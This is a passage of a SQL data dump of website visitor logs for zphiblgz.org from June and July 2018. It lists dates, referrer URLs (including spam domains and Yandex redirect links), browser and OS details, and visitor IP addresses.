oogle.com/','Chrome','Windows','67.0.3396.99','','108.31.56.219','000',2,0),(32389,'2018-06-28','http://sovetogorod.ru/','MSIE','Windows','6.0','','46.185.119.21','000',3,0),(32390,'2018-06-28','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(32391,'2018-06-28','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(32392,'2018-06-28','https://zphiblgz.org','MSIE','Windows','11.0','','188.240.208.26','000',2,0),(32393,'2018-06-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','192.185.2.54','000',1,0),(32394,'2018-06-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','79.170.44.92','000',1,0),(32395,'2018-06-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','50.63.196.170','000',1,0),(32396,'2018-06-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','213.251.182.106','000',1,0),(32397,'2018-06-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','212.227.109.59','000',1,0),(32398,'2018-06-28','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','109.74.195.60','000',2,0),(32399,'2018-06-28','http://zphiblgz.org/contact/','Firefox','Windows','42.0','','149.202.86.188','000',4,0),(32400,'2018-06-29','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.188.150','000',1,0),(32401,'2018-06-29','http://prostitutki-rostova.ru.com/','Unknown','Unknown','Unknown','','46.118.117.97','000',2,0),(32402,'2018-06-29','https://www.blog100.org/online-traffic-problems-are-now-a-thing-of-the-past/25881788/','Firefox','Windows','58.0','','112.5.248.243','000',1,0),(32403,'2018-06-29','https://zphiblgz.org','Unknown','Unknown','Unknown','','77.120.176.171','000',4,0),(32404,'2018-06-29','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(32405,'2018-06-29','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',1,0),(32406,'2018-06-29','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(32407,'2018-06-29','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(32408,'2018-06-29','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.189.146','000',1,0),(32409,'2018-06-29','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.86','000',1,0),(32410,'2018-06-29','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(32411,'2018-06-29','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,0),(32412,'2018-06-29','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.31','000',1,0),(32413,'2018-06-29','http://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','199.30.24.192','000',1,0),(32414,'2018-06-29','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.31','000',1,0),(32415,'2018-06-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1833.wlNhijB93T0VjWidYDbFaXVgTbXXVp5SwDDcE1aoWz0.eb18d1a9669315542ae11af38e104ab55f947e59&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043UmgyelEyMTM4TlRtaEc5WWo1SnBDR1d3SF9lcU1kYTVjbHJXb2RCdGpWQSws&sign=a65f7a7833bbd40a42d96fee8577b7af&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','162.243.170.186','000',2,0),(32416,'2018-06-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1833.me8Zaam231YSNjreP5KWxDrBaGYh8rZKQAniKol0CvY.99b3f743fbf5dc1be840a9e689450a78ff8106f1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042T25QV1U0UVRNaWtFRVk3YTQ3QmdvdGV6RHZrT3oxTlhzQ2p3X0NwUEJpdyws&sign=f670b8f0245226f0446ff677175d96c9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.234.17','000',2,0),(32417,'2018-06-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1833.rhyaHZ2UpmQ15OVh7kaa228129hTgVcwCjkWJEXRnVQ.11019a05a83483a05b3577b97ceb3feb4dee3010&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042WmtpMmdXNkZhUXEzVjNQWnlVVzl2SEIxdXBiZW1HUVRRX0hHNHNGaTBkZyws&sign=a9b4cb3431e43390b9805e3fdd81bda9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.35.23','000',2,0),(32418,'2018-06-29','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1833.4ibrwygyL0FqjiwiiueRsa8_cnsbncdlGwwKQE_DEaI.49839d8224479c1b1a0ab30d93104421343d9b89&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040Yll5RzBTVHRpcXd1WGk2THFlS0lIT1VIeW9FR1NMM2NTbHZkTXRGVENLUSws&sign=fbf579d04b6c95fa973acbd12cdea3b4&keyno=0&b64e=2&l10n=ru','Firefox','Linux','52.0','','213.183.54.35','000',2,0),(32419,'2018-06-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1833.5ji5Z27yyubOxuGkNRqMnIvhGVHARm7MJFX2rhGfdIA.cd2da025273ac47b1e226a4a608bb92b41067817&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042ZEcwN2pTQmsyVDNQQlMzZVN1SFRZdklkZ0tuOGZfeVNPU21vQzBodi04USws&sign=7a118896bf9260f2c7b8206b6a1f6b62&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.166.55','000',2,0),(32420,'2018-06-29','https://zphiblgz.org','Firefox','Linux','50.0','','87.50.153.85','000',1,0),(32421,'2018-06-29','https://zphiblgz.org','Firefox','Linux','45.0','','87.50.153.85','000',2,0),(32422,'2018-06-29','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.178.155','000',1,0),(32423,'2018-06-29','74.220.219.51','Firefox','Windows','33.0','','159.203.81.93','000',1,0),(32424,'2018-06-29','https://zphiblgz.org','Firefox','Windows','40.1','','39.32.250.56','000',2,0),(32425,'2018-06-29','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','162.247.74.74','000',1,0),(32426,'2018-06-29','https://officedocuments.net/','MSIE','Windows','6.0','','46.119.126.184','000',2,0),(32427,'2018-06-29','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(32428,'2018-06-29','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.31','000',1,0),(32429,'2018-06-29','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.31','000',1,0),(32430,'2018-06-29','https://zphiblgz.org','Chrome','Macintosh','54.0.2846.53','','104.144.155.167','000',1,0),(32431,'2018-06-29','https://zphiblgz.org','Firefox','Windows','40.1','','79.49.61.158','000',2,0),(32432,'2018-06-29','https://zphiblgz.org','Python','Unknown','3.6','','34.240.163.212','000',2,0),(32433,'2018-06-29','https://dawlenie.com/','MSIE','Windows','6.0','','46.118.113.218','000',1,0),(32434,'2018-06-29','http://udav.net/','MSIE','Windows','6.0','','46.185.119.21','000',3,0),(32435,'2018-06-29','http://skinali.photo-clip.ru/','Opera','Windows','7.11','','46.119.118.153','000',1,0),(32436,'2018-06-29','https://zphiblgz.org','Chrome','Macintosh','65.0.3325.162','','52.165.148.51','000',1,0),(32437,'2018-06-29','http://www.google.com/','Chrome','Android','67.0.3396.87','','69.140.138.162','000',2,0),(32438,'2018-06-29','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.169.253','000',1,0),(32439,'2018-06-30','https://zphiblgz.org','python-requests','Unknown','2.18.4','','104.244.76.187','000',11,0),(32440,'2018-06-30','https://zphiblgz.org','Firefox','Windows','36.0','','104.244.76.187','000',2,0),(32441,'2018-06-30','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','83.136.249.195','000',2,0),(32442,'2018-06-30','http://sladkoevideo.com/','Unknown','Unknown','Unknown','','46.118.113.218','000',3,0),(32443,'2018-06-30','https://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.236.227.169','000',3,0),(32444,'2018-06-30','http://xn-----6kcamwewcd9bayelq.xn--p1ai/','Opera','Windows','7.11','','46.118.117.97','000',2,0),(32445,'2018-06-30','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','185.107.47.215','000',1,0),(32446,'2018-06-30','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(32447,'2018-06-30','https://zphiblgz.org','Python','Unknown','3.6','','72.180.91.83','000',1,0),(32448,'2018-06-30','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(32449,'2018-06-30','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.29','000',1,0),(32450,'2018-06-30','http://pornoplen.com/','Opera','Windows','7.60','','46.119.126.184','000',2,0),(32451,'2018-06-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1834.hq9LB3NUDYjWwLgdGF5umJkbXc6VL8liaRpuVlOv0hs.40e347eefcd23eb24b7de2d1165e445654c4a702&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041anZxNUhIbHF4QU01U2dFOFFvRnE2Rl8tRGlGS0o2bllwTVVudmRiaDBaQSws&sign=df125641c21df6fb0005f9d29adebb07&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.32.62.219','000',2,0),(32452,'2018-06-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1834.zBC-jJeAgTXF7SzAz4kdhSlcpD0M9fDkgUCVQ2HzueE.d7caf2d1f3f0e19fb2e883e1e8ab2c0d61b7293c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043WlNLcThzNkk5YjJjbjRWYVo0cEMzWFFKTFlvdjg5XzhFc2U0VXVyNkpUdyws&sign=8013a6b3c9c50b88d28f58937fb50a11&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.125.203','000',2,0),(32453,'2018-06-30','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1834.FTXElqyE7b3lhEIRnwpFFWrXxok4GgqjOXQ0gR0QU2Q.a69033a734059554e7b39a3ead496688fb910fdc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041ck8zOGIzdFpkbnFiUWZJQ2NHY0ZEVVJSdUktMk9zUi1vWWgyNGhIMndMdyws&sign=dd2d40d4208a5063fbddb2f9484e20c8&keyno=0&b64e=2&l10n=ru','Firefox','Linux','52.0','','77.73.67.149','000',2,0),(32454,'2018-06-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1834.SUKbBKswK0wHWKa7H1LbvPgh1tZyXUFAtkBWSxkR000.38adee7e478b7162b6d362b7b2b1fc157397e966&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042bUZMTFJHN1Bwd1VlUWZyc0VYOGhXckxrM0xQbnRCaWdMdHVBVnJCWE4ydyws&sign=9405a23889f3b653db1ac61747e3284e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.62.206.134','000',2,0),(32455,'2018-06-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1834.KLtaQNui_kXD9raQhxY7hfY5MqjB7dfFHcvarVBE8Fs.ea6d9b496cc658f8b0c13ec2b87f3e4f0ac9b7a4&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042UlFNbTZueVplSEJfdzExOFltU2F3Qk5BMWRlZEFSWUVIV0w1ZFZGX2Zadyws&sign=b3b2b66f097838cfc91d8a9e383faba0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','103.102.45.13','000',2,0),(32456,'2018-06-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1834.VN19jstK1CXPttoNrPqD8MGPytso4t54_FosCaooqiw.6f21ae35de07dbd8bb664d7adc2d901c59de2c3d&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042clFka21hcFZYZVFDQ3gwSk1mVVFYUUU2OFRSQ1NFTTNqcVcxQkMxRFVFQSws&sign=40ae6576389aad75b4585cfe1d513b19&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','162.243.140.223','000',2,0),(32457,'2018-06-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1834.C6ccznHgY1j0X516iAn2jFJcEWiZVtEoz_RC7oif7iI.148352485839f8a6d6e5c7a94448e6e8b50f5174&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040RFowUjZTelB5LU9wdzRYZlhsQk93MURhaElycHR5SExxTTl4Y3dRNzNTQSws&sign=335d9662c6911658f91f01aea94432c6&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.41.77','000',2,0),(32458,'2018-06-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1834.aeYTN8yvmjCO9fLMe1wNkJjsy495GRGVz5nbk0M46Kg.8af69b4d128f16ed750194b0ab9e6bfdeaf84673&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043dkNZbUYtQzVtT09zLUxxRFFUVjhKcTRMS2ZxbnkxNzJ2MTRGb01EQjhaQSws&sign=74775759f9a3eca499d71aeda427e84b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.14.95','000',2,0),(32459,'2018-06-30','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.173','000',1,0),(32460,'2018-06-30','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.32','000',1,0),(32461,'2018-06-30','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.32','000',1,0),(32462,'2018-06-30','http://porno-chaman.info/','Opera','Windows','7.60','','46.118.117.97','000',3,0),(32463,'2018-06-30','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(32464,'2018-06-30','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.29','000',1,0),(32465,'2018-06-30','https://zphiblgz.org','Firefox','Windows','17.0','','89.238.167.167','000',5,0),(32466,'2018-06-30','http://shnyagi.net/','Opera','Windows','6.01','','46.118.113.218','000',2,0),(32467,'2018-06-30','http://xn--d1abj0abs9d.in.ua/','Opera','Windows','8.00','','46.119.118.153','000',2,0),(32468,'2018-06-30','https://yhirurga.ru/','Opera','Windows','7.11','','46.118.113.218','000',3,0),(32469,'2018-06-30','https://zphiblgz.org','MailChimp','Unknown','Unknown','','35.237.227.69','000',1,0),(32470,'2018-06-30','https://zphiblgz.org','MailChimp','Unknown','Unknown','','35.237.137.211','000',1,0),(32471,'2018-06-30','http://kino2018.cc/','Opera','Windows','8.01','','46.119.126.184','000',2,0),(32472,'2018-06-30','http://www.zphibmaryland.org/chapters/','SamsungBrowser','Android','7.0','','99.203.16.25','000',3,0),(32473,'2018-06-30','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(32474,'2018-06-30','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','69.30.214.6','000',1,0),(32475,'2018-06-30','https://modforwot.ru/','Opera','Windows','7.54','','46.118.117.97','000',2,0),(32476,'2018-06-30','https://www.google.com/','Chrome','Macintosh','66.0.3359.181','','71.76.166.237','000',3,0),(32477,'2018-06-30','https://zphiblgz.org','python-requests','Unknown','2.19.1','','105.103.249.61','000',1,0),(32478,'2018-06-30','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(32479,'2018-06-30','https://zphiblgz.org/','Chrome','Windows','61.0.3163.100','','94.16.122.115','000',3,0),(32480,'2018-06-30','https://www.google.com/','Chrome','Windows','67.0.3396.99','','47.205.249.66','000',2,0),(32481,'2018-06-30','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.110.204','000',2,0),(32482,'2018-07-01','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.27','000',1,0),(32483,'2018-07-01','https://zphiblgz.org/','Safari','iPhone','11.0','','174.205.0.55','000',1,0),(32484,'2018-07-01','http://medicineseasybuy.com/','MSIE','Windows','6.0','','46.118.117.97','000',2,0),(32485,'2018-07-01','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','188.165.208.29','000',2,0),(32486,'2018-07-01','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(32487,'2018-07-01','http://www.baidu.com/s?wd=doctorwvd','Firefox','Windows','43.0','','14.215.176.9','000',1,0),(32488,'2018-07-01','https://zphiblgz.org','Firefox','Windows','43.0','','14.215.176.147','000',2,0),(32489,'2018-07-01','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.29','000',1,0),(32490,'2018-07-01','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(32491,'2018-07-01','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.89.219','000',1,0),(32492,'2018-07-01','https://zphiblgz.org','Firefox','Windows','40.1','','120.56.194.142','000',2,0),(32493,'2018-07-01','https://zphiblgz.org','Firefox','Windows','40.1','','46.123.254.89','000',2,0),(32494,'2018-07-01','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.31','000',1,0),(32495,'2018-07-01','https://eduserver.net/','MSIE','Windows','6.0','','178.137.83.231','000',2,0),(32496,'2018-07-01','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1835.441AzH7zZwx1Avwe6Sjd8rRTwJO_lAAOtK2pzN8xhhs.7cb89be6683dc9ab02ac1a6ea047d630284465a7&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041TnplWWljRExSMXlhd3d1Q3ZLdWJjb2NOUTNtSF90MFJZbGkyX3k5YmZRZyws&sign=44460f6900f1eb0e9cca4be6f4c0967e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.189.44','000',2,0),(32497,'2018-07-01','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1835.4qTy7P_8Mr-l0etswmGilioBf_kBE8i65f7VNes2ujU.3605e124df81dbafe7c51282111a233ab90a69d1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041VXdGa2NaNHAtckNqMTl2RTI3LVJQWmJxVWVjOW1kYUszQ3Y0UEgzeFdzQSws&sign=425a5a07a4332fc27b9f96197c4203df&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.226.128','000',2,0),(32498,'2018-07-01','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1835.GuzJIRXXswfXmqmjdidR41P2tZxDSTU_NPZ7VBhOfNQ.e69b5ecd8eeff2f8ebd299b957689e9ca54109ae&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043V2YxcFNnZ1JxWUJ3di1UVUx5b0xaa3hsbkpCMmV4ckFOMHZ0S3dYVzJSQSws&sign=370d4de60155ae4dd24f8115c2e49118&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.203.244.106','000',2,0),(32499,'2018-07-01','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1835.M27BBWWNg6Izc46Zkqd_a9F37SkKp9scJ6RP2EBb8-k.7e9fa1a242479c95bef7d1c50c614e2c401a0d0b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040TmZvdkkzRldsTllwa1dydXZLN0tWaGZqU1FoMXBkTXNhNXJKSzNSbHNEZyws&sign=6e50d49b04956108283c13f8872a232e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.37.100','000',2,0),(32500,'2018-07-01','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1835.wQXz5i5pSZBhwetfYyFau9l9gFogrLFyKhJocNIzuFA.8dc552f1dc3e1b4e8eb85e1951bd877fe40d26c0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040Q0k1ekpvMlJUNUoxOFNDZmIzT0dPZTVlWGZFaEdaSXhRdmxHYXV4WEU0Zyws&sign=8d352a0894b9e5b4e70ac6035ac5e7fa&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.185.240','000',2,0),(32501,'2018-07-01','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',2,0),(32502,'2018-07-01','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(32503,'2018-07-01','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.29','000',1,0),(32504,'2018-07-01','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.29','000',1,0),(32505,'2018-07-01','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.28','000',1,0),(32506,'2018-07-01','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.28','000',1,0),(32507,'2018-07-01','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.30','000',1,0),(32508,'2018-07-01','https://mybuh.kz/','MSIE','Windows','6.0','','46.119.115.156','000',2,0),(32509,'2018-07-01','https://zphiblgz.org','Safari','iPhone','8.0','','123.125.71.98','000',1,0),(32510,'2018-07-01','https://zphiblgz.org','Safari','iPhone','8.0','','220.181.108.174','000',1,0),(32511,'2018-07-01','https://zphiblgz.org','Safari','iPhone','8.0','','123.125.67.153','000',1,0),(32512,'2018-07-01','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(32513,'2018-07-01','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',2,0),(32514,'2018-07-01','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(32515,'2018-07-01','http://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','199.30.24.203','000',1,0),(32516,'2018-07-01','https://images.google.com/','Safari','Macintosh','9.1.3','','47.196.44.246','000',2,0),(32517,'2018-07-01','https://zphiblgz.org','Chrome','Macintosh','40.0.2214.93','','54.215.194.144','000',2,0),(32518,'2018-07-01','https://zphiblgz.org','Chrome','Linux','63.0.3205.0','','54.193.93.53','000',3,0),(32519,'2018-07-01','https://zphiblgz.org','Chrome','Macintosh','50.0.2661.102','','54.183.150.171','000',32,0),(32520,'2018-07-01','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.34','000',1,0),(32521,'2018-07-01','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(32522,'2018-07-01','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(32523,'2018-07-01','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',1,0),(32524,'2018-07-01','http://xn-----6kcamwewcd9bayelq.xn--p1ai/','MSIE','Windows','6.0','','176.8.89.165','000',2,0),(32525,'2018-07-01','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.35','000',1,0),(32526,'2018-07-01','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.28','000',1,0),(32527,'2018-07-01','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.28','000',1,0),(32528,'2018-07-01','http://pc-services.ru/','Opera','Windows','6.0','','46.119.115.156','000',1,0),(32529,'2018-07-01','http://xn--d1abj0abs9d.in.ua/','MSIE','Windows','6.0','','46.185.119.21','000',3,0),(32530,'2018-07-01','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.35','000',1,0),(32531,'2018-07-01','https://zphiblgz.org','Safari','iPhone','8.0','','220.181.108.167','000',1,0),(32532,'2018-07-01','https://zphiblgz.org','Safari','iPhone','8.0','','220.181.108.101','000',1,0),(32533,'2018-07-01','https://zphiblgz.org','Safari','iPhone','8.0','','220.181.108.118','000',1,0),(32534,'2018-07-01','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.31','000',1,0),(32535,'2018-07-01','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(32536,'2018-07-01','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.30','000',1,0),(32537,'2018-07-01','https://zphiblgz.org','Firefox','Windows','40.1','','103.46.201.199','000',2,0),(32538,'2018-07-01','https://zphiblgz.org','Firefox','Windows','40.1','','88.255.94.40','000',2,0),(32539,'2018-07-01','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.111.57','000',3,0),(32540,'2018-07-01','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(32541,'2018-07-01','https://zphiblgz.org','Chrome','Linux'